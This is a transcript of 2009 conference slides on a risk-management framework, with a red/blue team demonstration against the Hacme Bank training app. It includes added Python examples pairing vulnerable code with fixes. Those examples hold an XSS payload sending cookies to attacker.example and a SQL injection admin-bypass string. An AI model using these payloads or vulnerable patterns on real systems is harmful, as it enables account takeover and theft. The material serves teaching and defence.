Inverting Risk Management for Ethical Hacking
SecureWorld Expo '09
Transcript of presentation slides
09/16/2009 © Kris Kahn, 2009
Agenda
Speaker Introductions
Learning Objectives
Framework of Risk Management & Analysis (FoRMA)
Duality of Risk
Demonstration of Information Warfare Scenario
Wrap-Up
Q&A
Introductions
Speaker: Kris Kahn, CISSP, CISA, CGEIT, OPSA
Senior Staff, Electronic Security Governance
Seagate Technology LLC
Co-Speaker: Brian Shura, PCI-QSA
Director of Penetration Testing
AppSec Consulting
Audience
Attendees should be involved with penetration testing or managing risks, such as:
IT Security Staff
Risk Managers
Company Officers
Ethical Hackers
Recommended knowledge:
Familiarity with security best practices
Understanding of risk management concepts
Experience with penetration testing
Learning Objectives
Understand the advantage of validating your security measures through ethical hacking
Recognize the benefits of applying Risk Management and Risk Exploitation methods
Understand your control options to mitigate risks
Balance your enterprise security using FoRMA
FoRMA Overview
Benefits of FoRMA
Big Picture: holistic relationship of related security models.
Technology Independent: universal risk management concepts.
Business Focused: minimize risk, instead of maximizing security.
Overview
A framework for integrating industry standard models, such as CIA*, STRIDE* and others.
Addresses Risk and Control elements:
Risk: Threat, Vulnerability
Control: Technology, Process
*: See references at the end of the presentation material
Goal of FoRMA: Risk Mitigation
– I.e. control risks within acceptable limits to support business objectives
Establish Your Boundaries:
Define relevant policies, standards and best-practices
Protect assets and resources in accordance with policy
Detect policy violations
Assure policy compliance
Building your foundation
Start from the ground level and work your way up!
Construct a strong security foundation to build your security policies, standards and best-practices. Use industry established security methodologies and codes of best practice to guide your standards and practices.
A security foundation supports all layers (including physical, network, application, etc), and addresses each security implementation phase (Awareness, Protection, Detection, and Assurance).
Building your foundation
Use Methodology with Sub-Model to evaluate Subject
*: See references at the end of the presentation material

Methodology                 Model     Subject
Threat Management           STRIDE*   Threat
Security Architecture       APAIN*    Technology
Security Management         RIVET*    Process
Asset/Resource Management   CIA*      Vulnerability
Building your foundation
This is a layered model based on the OSI reference model*, which identifies five (of the original seven) layers where critical assets and resources can be identified:
Data
Application
System
Network
Physical
Identify, Analyze, Control, Maintain, repeat. This process life cycle will guide you through the framework to the appropriate security resolution.
Risk Mitigation Life Cycle

Step       Source (Threat)       Target (Asset)              Result
Identify   Threat Discovery      Asset Valuation             Business Survey
Analyze    Threat Assessment     Vulnerability Assessment    Assessed Risk
Control    Threat Mitigation     Vulnerability Reduction     Controlled Risk
Maintain   Threat Management     Asset Management            Managed Risk
Risk Mitigation Life Cycle: Identify
Risks can be received through many input channels. If a risk is raised by a security incident, the threat source needs to be identified to help guide the remediation. Inactive threats from untrusted sources should also be discovered.
Valuating the business importance of the asset will drive the prioritization of the remediation.
Identify: Threat Discovery, Asset Valuation, Business Survey
Risk Mitigation Life Cycle: Analyze
To determine the risk, you must understand the threat of attack and the vulnerability of the asset or resource. We measure and analyze these items in detail to determine the corresponding risk.
Analyze: Threat Assessment, Vulnerability Assessment, Assessed Risk
Risk Mitigation Life Cycle: Control
Once you have assessed the risk, you can apply control mechanisms in the form of technology to mitigate the threat or reduce the vulnerability.
Control: Threat Mitigation, Vulnerability Reduction, Controlled Risk
Risk Mitigation Life Cycle: Maintain
Once a system is live, you apply counter-measures in the form of processes in the event of an attack (Incident Response) or to assure the integrity of the technology (Security Assessments).
Implement change control and regular audit processes to verify when an aspect of the formula has changed.
Maintain: Threat Management, Asset/Resource Management, Managed Risk
FoRMA Model Overview
Risk: Threat, Vulnerability
Control: Technology, Process
Implementation phases: Awareness, Protection, Detection, Assurance
Implementation: Phases
1. Awareness
2. Protection
3. Detection
4. Assurance
Risk Mitigation Phases & Life Cycle
Each implementation phase (Awareness, Protection, Detection, Assurance) runs its own Identify, Analyze, Control, Maintain (IACM) life cycle.
Duality of Risk
Risk Prevention vs Risk Exploitation
Using opposing objectives, the model can be used strategically to take advantage of vulnerabilities instead of preventing damage.

Life cycle step   Risk Exploitation          Risk Prevention
Identify          Reconnaissance             Discover
Analyze           Evaluate Risks             Evaluate Risks
Control           Exploit Risks              Mitigate Risks
Maintain          Risk/Control Divergence    Balance Risk/Control
Risk Analysis Strategies
The Blue Team's strategy is to create a balance by mitigating the risk with the appropriate amount of control. The remaining risk is acknowledged, regularly checked and managed.
Risk = Control (+/- acceptable residual control/risk)
The Red Team's strategy is to subvert the control and leverage the risk, keeping the scales tipped in their favor.
Risk > Control
Both teams need to analyze the risks and the controls to be able to execute their strategies.
FoRMA Model for Ethical Hacking
Risk: Threats, Vulnerabilities
Control: Technology, Process
Blue Team Strategy phases: Awareness, Protection, Detection, Assurance
Red Team Strategy phases: Deception, Intrusion, Evasion, Corruption
© Kris Kahn, 2009 http://www.cybernetix.com/forma
Risk Exploitation Phases & Life Cycle
Each exploitation phase (Deception, Intrusion, Evasion, Corruption) runs its own Identify, Analyze, Control, Maintain (IACM) life cycle.
Information Warfare Scenario: Red Team/Blue Team Demonstration
Business: Become profitable by offering banking services on-line. Validate security controls through a third-party Pen Test.
Blue Team - Operations: Support the business by identifying and reducing risk.
Red Team - Ethical Hackers: Exploit weaknesses to gain access to customer data, administrative functions, and financial transactions.
Penetration and Defense Life-Cycles: Objectives
Red Team: 1. Deception  2. Intrusion  3. Evasion  4. Corruption
Blue Team: 1. Awareness  2. Protection  3. Detection  4. Assurance
Background: The business selected a Windows system running an IIS web server as their online customer interface to their WebService-based banking system and their back-end database system (MS SQL Server).
Target
Free penetration testing platform: Hacme Bank simulates a "real-world" web services-enabled online banking application, which was built with a number of known and common vulnerabilities.
Red Team: Phase 1 (Deception)
I: Target web server
A: Manual JavaScript vulnerability test on web-based forum
C: Cross-Site Scripting (XSS) code to steal admin cookie and reuse it
M: Elevate privileges of own account to admin status
Analyze: Enter a test string into the forum [screenshot]
Result: [screenshot]
Conclusion: Vulnerability exists to allow XSS attack that may lead to Elevation of Privileges (Admin access)
Risk Level: High
Control & Maintain: XSS code to steal and reuse cookie to gain access [screenshot]
Maintain: Set attacker account privilege to Admin type
Risk Level: High
Blue Team: Phase 1 (Awareness)
I: Focus on accounts and authorized access
A: Validate user accounts and appropriate privileges
C: Repair access/accounts as necessary
M: Improve coding practices
Analyze: Validate accounts through database [screenshot]
Conclusion: Admin privileges inappropriate for user account, may be due to error, root cause analysis in progress
Control: Remove unauthorized admin privileges for user account
Risk Level: High
Control & Maintain: Find XSS attack in forum and clean up [screenshot]
Maintain: Patch to prevent special characters entered in forum using input validation; improve coding practices to anticipate this vulnerability
Risk Level: Low
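The forum attack from Red Team Phase 1 and the Blue Team's Phase 1 fix, as an added example that is not code from the slides or from Hacme Bank: a forum post rendered without encoding executes the attacker's script, which can send the viewing admin's cookie to an attacker-controlled host, while HTML-encoding the post on output (plus the input validation the slides apply) removes it. The post body, the cookie name SessionId and the host attacker.example are constructed. Marking the session cookie HttpOnly is an added defence the slides do not mention; it keeps document.cookie from exposing the session even if an XSS slips through.

```python
"""Stored XSS in a forum post: vulnerable render, fixed render, and the
cookie flag that blunts cookie theft. Added example; names are constructed."""
import html
import re
from http.cookies import SimpleCookie

# Constructed attacker post: rendered raw, the browser runs it and sends the
# reader's cookies (an admin's, if an admin reads the thread) to the attacker.
XSS_PAYLOAD = (
    "Nice site!<script>new Image().src="
    "'http://attacker.example/c?'+document.cookie</script>"
)
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
FORBIDDEN_INPUT = set('<>&"')          # the slides' fix: reject special characters


def render_post_vulnerable(author: str, body: str) -> str:
    """Pre-fix behaviour: user input is pasted straight into the HTML."""
    return f"<div class='post'><b>{author}</b>: {body}</div>"


def render_post_fixed(author: str, body: str) -> str:
    """Fix: encode every untrusted value for the HTML context it lands in."""
    return (
        f"<div class='post'><b>{html.escape(author, quote=True)}</b>: "
        f"{html.escape(body, quote=True)}</div>"
    )


def validate_forum_input(body: str) -> bool:
    """Input validation as on the slides: refuse posts carrying HTML metacharacters.
    Output encoding above still applies; validation alone is easy to bypass."""
    return not (FORBIDDEN_INPUT & set(body))


def contains_live_script(rendered_html: str) -> bool:
    """True if the rendered page still carries an executable <script> start tag."""
    return SCRIPT_TAG.search(rendered_html) is not None


def session_cookie_header(session_id: str, secure: bool = True) -> str:
    """Set-Cookie value for the session. HttpOnly stops script from reading it,
    so a surviving XSS cannot ship it off; Secure keeps it off plaintext HTTP."""
    cookie = SimpleCookie()
    cookie["SessionId"] = session_id
    cookie["SessionId"]["httponly"] = True
    cookie["SessionId"]["path"] = "/"
    if secure:
        cookie["SessionId"]["secure"] = True
    return cookie.output(header="").strip()


if __name__ == "__main__":
    before = render_post_vulnerable("mallory", XSS_PAYLOAD)
    after = render_post_fixed("mallory", XSS_PAYLOAD)
    print("vulnerable render runs script:", contains_live_script(before))
    print("fixed render runs script:     ", contains_live_script(after))
    print("input validation accepts post:", validate_forum_input(XSS_PAYLOAD))
    print(session_cookie_header("0123456789abcdef"))
```

The cookie flag matters because the Red Team's "Maintain" step (promoting its own account) only works once it holds the admin's session; with HttpOnly set, the same XSS can still deface the forum but cannot read the cookie.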
Red Team: Phase 2 (Intrusion)
I: Target data flow
A: Test for SQL injection vulnerabilities
C: Exploit SQL injection flaws to bypass authentication and access admin account
M: Gather sensitive information from back-end database
Analyze: Perform a manual test using a single quote (') to verify whether a field is vulnerable to SQL injection [screenshot]
Conclusion: SQL injection is possible and may lead to Elevation of Privileges (Admin access)
Risk Level: Medium
Control: Use SQL injection attack on password field [screenshot]
Successfully bypassed the authentication logic
Risk Level: High
Control: Leverage admin function to gather additional data [screenshot]
Risk Level: High
Maintain: Gather sensitive information from back-end database [screenshot]
Risk Level: High
Blue Team: Phase 2 (Protection)
I: Focus on database server SQL activity
A: Assess potential unauthorized access to back-end database through application
C: Install web application firewall for SQL injection protection
M: Update application code to use parameterized queries to prevent SQL injection
Analyze: Unauthorized SQL activity discovered [screenshot]
Conclusion: Unauthorized access to database through application exposed user records with passwords
Risk Level: High
Control & Maintain: Install WebKnight to mitigate risk of SQL injection attacks
Maintain: Update application code to use parameterized queries to prevent SQL injection; encrypt passwords in database
Risk Level: Low
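The password-field injection from Red Team Phase 2 beside the parameterized query the Blue Team ships in its Phase 2 fix, as an added example that is not code from the slides or from Hacme Bank. SQLite stands in for the slides' MS SQL Server, and the users table with its two accounts is constructed. Where the slides say "encrypt passwords in database", the example stores a salted PBKDF2 hash instead, since a login only has to verify a password and never needs to recover it; that substitution is the editor's, not the presenters'.

```python
"""SQL injection login bypass and its parameterized fix. Added example;
the users table, accounts and passwords are constructed."""
import hashlib
import hmac
import os
import sqlite3
from typing import Optional, Tuple

PBKDF2_ROUNDS = 100_000


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as '<salt hex>$<digest hex>'."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"{salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate.hex(), digest_hex)


def build_bank_db(hashed: bool) -> sqlite3.Connection:
    """In-memory stand-in for the bank's users table (constructed data).
    hashed=False reproduces what the Red Team found: plaintext passwords."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_name TEXT PRIMARY KEY, "
               "password TEXT NOT NULL, is_admin INTEGER NOT NULL)")
    users = [("jm", "jm", 0), ("admin", "Adm1n-Passw0rd!", 1)]
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(u, hash_password(p) if hashed else p, a) for u, p, a in users])
    db.commit()
    return db


def login_vulnerable(db: sqlite3.Connection, user_name: str,
                     password: str) -> Optional[Tuple[str, int]]:
    """Pre-fix login: both fields are concatenated into the SQL text, so the
    password field can rewrite the WHERE clause."""
    sql = ("SELECT user_name, is_admin FROM users WHERE user_name = '"
           + user_name + "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()


def login_fixed(db: sqlite3.Connection, user_name: str,
                password: str) -> Optional[Tuple[str, int]]:
    """Fixed login: the user name travels as a bound parameter, so its content
    can never change the statement; the password is checked in code against
    the stored hash instead of being compared inside SQL."""
    row = db.execute(
        "SELECT user_name, password, is_admin FROM users WHERE user_name = ?",
        (user_name,)).fetchone()
    if row is None or not verify_password(password, row[1]):
        return None
    return (row[0], row[2])


# The slides' technique in the password field: close the string literal, OR in
# a condition that is true only for the admin row, comment out the rest.
ADMIN_BYPASS = "' OR is_admin = 1 --"

if __name__ == "__main__":
    legacy, patched = build_bank_db(hashed=False), build_bank_db(hashed=True)
    print("legacy,  injected password:", login_vulnerable(legacy, "x", ADMIN_BYPASS))
    print("patched, injected password:", login_fixed(patched, "x", ADMIN_BYPASS))
    print("patched, real credentials :", login_fixed(patched, "admin", "Adm1n-Passw0rd!"))
```

The single-quote probe on the slides works because the vulnerable statement above fails to parse once an unbalanced quote lands in it; the error page that follows is what the Red Team reads in Phase 4 for further leads, so the fix should also stop returning database errors to the client.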
Red Team: Phase 3 (Evasion)
I: Target hidden directories and files
A: Evade signature-based detection while scanning for application backdoors
C: Access the test admin functionality without authenticating
M: Create ghost account for system owner
Analyze: Use SensePost Wikto to identify backdoors [screenshot]
Conclusion: Back-door may lead to admin functionality
Risk Level: Medium
Control & Maintain: Exploit discovered development access to admin functionality [screenshot]
Maintain: Create "ghost" account similar to owner's name
Risk Level: High
Blue Team: Phase 3 (Detection)
I: Focus on web activity
A: Review logs for problems or malicious activity
C: Clean up production environment and disable ghost account
M: Prevent external access to all admin functionality; access admin functions locally only
Analyze: Web server log files show increased file size and activity [screenshot]
Conclusion: Web server scanning discovered a back-door exposing admin functionality (again)
Risk Level: High
Control & Maintain: Remove development back-door and "ghost" account
Maintain: Prevent unauthorized access to admin tools; use WebKnight to filter on the URL
Risk Level: Low
Maintain: ...and retain local admin functionality [screenshot]
Risk Level: Low
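The log review behind the Blue Team's Phase 3 detection, as an added example that is not code from the slides or from Hacme Bank: parse IIS-style W3C log lines, flag a client that is probing for hidden directories (many 404s across many distinct paths, the footprint a Wikto run leaves whatever signature evasion it uses), and flag any admin-path request that did not come from the local host, which is the condition the Phase 3 "Maintain" step wants to hold. The log lines are constructed, and the "/admin" prefix is an assumption about where the admin tools live.

```python
"""Web-log detection: directory-scanning clients and external admin hits.
Added example; the log lines and the admin path prefix are constructed."""
from collections import defaultdict
from typing import Dict, List

ADMIN_PREFIXES = ("/admin",)            # assumed location of the admin tools
LOCAL_ADDRESSES = {"127.0.0.1", "::1"}  # only these may reach them after the fix

SCAN_PATHS = ["/backup/", "/test/", "/old/", "/dev/", "/_vti_bin/",
              "/cgi-bin/", "/phpmyadmin/", "/webadmin/", "/config.bak", "/scripts/"]

# Constructed W3C extended log in IIS layout: a normal user, a scanner that
# then finds the development admin page, and a legitimate local admin visit.
SAMPLE_LOG = "\n".join(
    ["#Software: Microsoft Internet Information Services 6.0",
     "#Fields: date time c-ip cs-method cs-uri-stem sc-status",
     "2009-09-16 10:01:02 10.0.0.5 GET /Default.aspx 200",
     "2009-09-16 10:01:09 10.0.0.5 POST /Login.aspx 302"]
    + [f"2009-09-16 10:02:{i:02d} 203.0.113.7 GET {path} 404"
       for i, path in enumerate(SCAN_PATHS)]
    + ["2009-09-16 10:02:30 203.0.113.7 GET /admin/ 200",
       "2009-09-16 10:03:00 127.0.0.1 GET /admin/ 200"])


def parse_w3c_log(text: str) -> List[Dict[str, str]]:
    """Turn W3C extended log text into dicts keyed by the #Fields names."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # the directive names the columns
        elif line.startswith("#") or not line.strip():
            continue                           # other directives, blank lines
        else:
            records.append(dict(zip(fields, line.split())))
    return records


def find_scanners(records: List[Dict[str, str]], min_404: int = 8) -> Dict[str, List[str]]:
    """Clients with at least min_404 distinct paths answered 404. Counting
    distinct missing paths, not payload signatures, catches scanners that
    avoid known attack strings."""
    missing = defaultdict(set)
    for r in records:
        if r["sc-status"] == "404":
            missing[r["c-ip"]].add(r["cs-uri-stem"])
    return {ip: sorted(paths) for ip, paths in missing.items() if len(paths) >= min_404}


def find_external_admin_hits(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Admin-path requests from anywhere but the local host: each one is a
    violation of the 'admin functions only locally' control."""
    return [r for r in records
            if r["cs-uri-stem"].lower().startswith(ADMIN_PREFIXES)
            and r["c-ip"] not in LOCAL_ADDRESSES]


if __name__ == "__main__":
    recs = parse_w3c_log(SAMPLE_LOG)
    for ip, paths in find_scanners(recs).items():
        print(f"scanner {ip}: {len(paths)} missing paths probed")
    for hit in find_external_admin_hits(recs):
        print(f"external admin access: {hit['c-ip']} {hit['cs-uri-stem']} -> {hit['sc-status']}")
```

Run against a real IIS log the thresholds need tuning (broken links from a legitimate crawler also produce 404s), and the admin-hit check should run after the WebKnight URL filter is in place to confirm the filter is actually blocking rather than logging.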
Red Team: Phase 4 (Corruption)
I: Identify other opportunities to access back-end data by reviewing details of previous error messages
A: Test access to XML forms
C: Use WebService to transfer funds
M: Re-enable attacker account
Analyze: Identify other non-application opportunities to access the data (captured previously) [screenshot]
Risk Level: Low
Analyze: Test available methods [screenshot]
Conclusion: Lookup by userID method is not restricted
Risk Level: Medium
Control: Use the soapUI tool to generate a request [screenshot]
Risk Level: Medium
Control: Acquire account number using the GetUserAccounts method [screenshot]
Risk Level: Medium
Control: Determine system owner's account balance [screenshot]
Risk Level: Medium
Control & Maintain: Transfer funds [screenshot]
Maintain: Use WebService to re-enable attacker account
Risk Level: High
Blue Team: Phase 4 (Assurance)
I: Focus on transaction activity
A: Identify significant banking activity and look for errors
C: Correct unauthorized account transfers, remove offending account
M: Implement authorization between the web application and the WebService
Analyze: Identify significant banking activity and account balance discrepancy [screenshot]
Conclusion: Internal WebService exposed externally is allowing unauthorized and unauthenticated access
Risk Level: High
Control & Maintain:
Audit all account activity and reverse unauthorized transactions.
Implement manual approval control for large on-line transfers.
Restrict the WebService to internal IP addresses only.
Maintain: Implement authentication between the calling application (Hacme Bank) and the web service.
Risk Level: Low
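The GetUserAccounts lookup the Red Team drove from soapUI in Phase 4, beside the two Blue Team Phase 4 controls (internal addresses only, and authentication between the calling application and the service), as an added example that is not code from the slides or from Hacme Bank's WebService. The account table, the 10.0.0.0/8 "internal" range and the shared HMAC key are constructed; the key is assumed to be provisioned to the web tier and the service out of band. The fixed handler also makes the web tier assert which user it authenticated and refuses lookups for anyone else, which is the authorization check the slide's "lookup by userID is not restricted" finding calls for.

```python
"""GetUserAccounts: the open lookup the Red Team used, and a handler that
checks source network, caller authentication and per-user authorization.
Added example; data, network range and key are constructed."""
import hashlib
import hmac
import ipaddress
from dataclasses import dataclass, replace
from typing import List, Optional, Tuple

# Constructed back-end data: user id -> [(account number, balance)].
ACCOUNTS = {
    1: [("5204320422040000", 5000.00)],   # the system owner
    2: [("5204320422040001", 250.00)],    # the attacker's own account
}
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]   # assumed bank LAN
SERVICE_KEY = b"example-key-provisioned-out-of-band"   # assumed shared secret


@dataclass(frozen=True)
class ServiceRequest:
    method: str
    user_id: int                           # whose accounts are requested
    source_ip: str
    caller_user_id: Optional[int] = None   # who the web app says it authenticated
    signature: str = ""                    # HMAC from the web tier, if any


def sign(method: str, user_id: int, caller_user_id: int, key: bytes = SERVICE_KEY) -> str:
    """HMAC over the fields the service will act on, so none can be altered in flight."""
    msg = f"{method}|{user_id}|{caller_user_id}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def make_app_request(user_id: int, caller_user_id: int, source_ip: str) -> ServiceRequest:
    """What the fixed web application sends on behalf of a logged-in user."""
    return ServiceRequest("GetUserAccounts", user_id, source_ip, caller_user_id,
                          sign("GetUserAccounts", user_id, caller_user_id))


def get_user_accounts_vulnerable(req: ServiceRequest) -> List[Tuple[str, float]]:
    """As the Red Team found it: any caller, any user id, no credentials."""
    return ACCOUNTS.get(req.user_id, [])


def authorize_request(req: ServiceRequest) -> Optional[str]:
    """Return the denial reason, or None when the request may proceed."""
    if not any(ipaddress.ip_address(req.source_ip) in net for net in INTERNAL_NETS):
        return "source address is not internal"
    if req.caller_user_id is None:
        return "caller not authenticated"
    expected = sign(req.method, req.user_id, req.caller_user_id)
    if not hmac.compare_digest(expected, req.signature):
        return "caller not authenticated"
    if req.caller_user_id != req.user_id:
        return "caller may only read its own accounts"
    return None


def get_user_accounts_fixed(req: ServiceRequest) -> List[Tuple[str, float]]:
    reason = authorize_request(req)
    if reason is not None:
        raise PermissionError(reason)
    return ACCOUNTS.get(req.user_id, [])


if __name__ == "__main__":
    # The soapUI request of the slides: external, unsigned, asking for user 1.
    external = ServiceRequest("GetUserAccounts", 1, "203.0.113.7")
    print("vulnerable:", get_user_accounts_vulnerable(external))
    print("fixed, external:", authorize_request(external))
    own = make_app_request(user_id=2, caller_user_id=2, source_ip="10.0.0.12")
    print("fixed, own account:", get_user_accounts_fixed(own))
    print("fixed, other user:", authorize_request(replace(own, user_id=1)))
```

Two things the example leaves out that a production service needs: the signed message carries no timestamp or nonce, so a captured request can be replayed until the key rotates, and the source-address check is only as good as the network path (TLS with client certificates between the tiers removes both gaps). The fund-transfer method on the slides needs the same three checks plus the manual-approval threshold the Blue Team introduced.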
Wrap-Up
Design security controls with the attacker's perspective in mind (and vice versa).
Be proactive in the implementation of phased controls.
Validate your controls through ethical hacking to ensure effectiveness.
Balance your enterprise security using a risk-based framework (FoRMA) that is focused on supporting business objectives.
Questions?
Feedback & Comments are welcome
Contact information: [email protected]
831-419-1256
Tools (downloadable, non-commercial)
Foundstone Hacme Bank http://www.foundstone.com/us/resources/proddesc/hacmebank.htm
Paros http://www.parosproxy.org/
SensePost Wikto http://www.sensepost.com/research/wikto/
soapUI http://www.soapui.org/
SQL Express Profiler http://code.google.com/p/sqlexpressprofiler/downloads/list
WebKnight http://aqtronix.com/?PageID=99
References (*)
• Control Objectives for Information and Related Technology (COBIT), trademarked by the IT Governance Institute (ITGI).
• Open Systems Interconnection (OSI) reference model, developed by the International Organization for Standardization (ISO) in 1984; now considered the primary architectural model for inter-computer communications.
• STRIDE Threat Model, conceived, built upon, and evangelized at Microsoft by Loren Kohnfelder, Praerit Garg, Jason Garms, and Michael Howard. Explained further in "Writing Secure Code, 2nd Ed" (ISBN 0-7356-1722-8), pages 83-86.
• CIA Security Model, author unknown, taught as part of the Common Body of Knowledge for the CISSP curriculum.
• APAIN, acronym for Security Architecture, developed by Curtis Coleman in 2001.
• RIVET, acronym for Security Management, developed by Kris Kahn in 2004.
• Failure Mode and Effects Analysis (FMEA) evolved as a process tool used by the United States military as early as 1949 and is currently part of the Six Sigma curriculum.
• Capability Maturity Model (CMM) is a trademark of Carnegie Mellon University.